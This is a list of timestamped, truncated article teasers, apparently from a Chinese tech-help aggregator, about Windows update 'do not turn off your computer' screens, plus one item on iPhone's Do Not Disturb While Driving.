2022/11/19 21:17:04 - 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...
本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法,并在最后教给你1种保护系统安全的好方法,一起来看看!电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中,添加了1个新功能在“磁…...
2022/11/19 21:17:03 - 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...
许多用户在长期不使用电脑的时候,开启电脑发现电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机。。.这要怎么办呢?下面小编就带着大家一起看看吧!如果能够正常进入系统,建议您暂时移…...
2022/11/19 21:17:02 - 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...
配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!配置windows update失败 还原更改 请勿关闭计算机&#x…...
2022/11/19 21:17:01 - 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...
不知道大家有没有遇到过这样的一个问题,就是我们的win7系统在关机的时候,总是喜欢显示“准备配置windows,请勿关机”这样的一个页面,没有什么大碍,但是如果一直等着的话就要两个小时甚至更久都关不了机,非常…...
2022/11/19 21:17:00 - 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...
当电脑出现正在准备配置windows请勿关闭计算机时,一般是您正对windows进行升级,但是这个要是长时间没有反应,我们不能再傻等下去了。可能是电脑出了别的问题了,来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...
2022/11/19 21:16:59 - 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...
我们使用电脑的过程中有时会遇到这种情况,当我们打开电脑之后,发现一直停留在一个界面:“配置Windows Update失败,还原更改请勿关闭计算机”,等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢࿰…...
2022/11/19 21:16:58 - 如何在iPhone上关闭“请勿打扰”
Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...
2022/11/19 21:16:57